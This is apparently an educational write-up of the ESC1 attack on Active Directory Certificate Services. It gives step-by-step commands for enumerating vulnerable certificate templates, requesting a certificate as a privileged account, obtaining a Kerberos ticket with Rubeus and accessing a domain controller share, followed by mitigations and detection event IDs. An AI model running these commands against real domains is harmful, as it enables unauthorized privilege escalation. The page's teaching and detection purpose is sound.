ESC1: Misconfigured Certificate Templates

Attack Overview

ESC1 is an attack vector that exploits misconfigured certificate templates in Active Directory Certificate Services (AD CS). This vulnerability allows low-privileged users to enroll in certificates that can be used for authentication, potentially leading to privilege escalation.

Attack Vector

Identify a certificate template with overly permissive enrollment rights.
Enroll in the vulnerable template to obtain a certificate.
Use the obtained certificate to authenticate as a higher-privileged user.
Exploit the elevated privileges to gain further access or control within the domain.

Impact

Privilege escalation, potentially to Domain Admin level
Unauthorized access to sensitive resources
Persistence within the compromised environment
Potential for lateral movement and further exploitation

Detailed Attack Procedure

Enumeration: Use tools like Certify or manual enumeration to identify vulnerable certificate templates.
```
certutil -template | findstr /i "mspki-certificate-name-flag"
```
Template Analysis: Look for templates with the following characteristics:
- ENROLLEE_SUPPLIES_SUBJECT flag is set
- Client Authentication or Smart Card Logon EKU
- Overly permissive enrollment rights
Certificate Request: Request a certificate using the vulnerable template, specifying a high-privileged account as the subject.
```
certreq -submit -attrib "CertificateTemplate:VulnTemplate" -config "DC01.domain.com\CA" request.inf
```
Certificate Usage: Use the obtained certificate to request a Kerberos TGT for the high-privileged account.
```
Rubeus.exe asktgt /user:admin /certificate:admin.pfx /ptt
```
Privilege Exploitation: Leverage the new privileges to access sensitive resources or perform privileged actions.
```
dir \\dc01\c$
```

Mitigation Strategies

Regularly audit and review all certificate templates
Ensure that templates used for authentication have appropriate enrollment permissions
Implement the principle of least privilege for certificate template configurations
Use security groups to control enrollment permissions
Enable and configure certificate request logging
Implement strong access controls on certificate templates and CA configurations
Regularly monitor for suspicious certificate enrollment activities

Detection

Event IDs to Monitor

4886: Certificate Services received a certificate request
4887: Certificate Services approved a certificate request and issued a certificate
4888: Certificate Services denied a certificate request
4889: Certificate Services set the status of a certificate request to pending
4890: The certificate manager settings for Certificate Services changed
5137: A directory service object was created (monitor for new certificate template creations)

Interactive Demo

Interactive ESC1 Attack Demo

Identify Vulnerable Template

Scan for certificate templates with overly permissive enrollment rights.

Demo Video:

Windows Command:

certutil -template | findstr /i "mspki-certificate-name-flag"

Linux Command:

certipy find -vulnerable -dc-ip <DC_IP> -u <username> -p <password>

Enroll in Template

Request a certificate using the vulnerable template.

Obtain Certificate

Receive the issued certificate from the Certificate Authority.

Authenticate as High-Privilege User

Use the obtained certificate to authenticate as a higher-privileged user.

Exploit Elevated Privileges

Leverage the new privileges to access sensitive resources or perform privileged actions.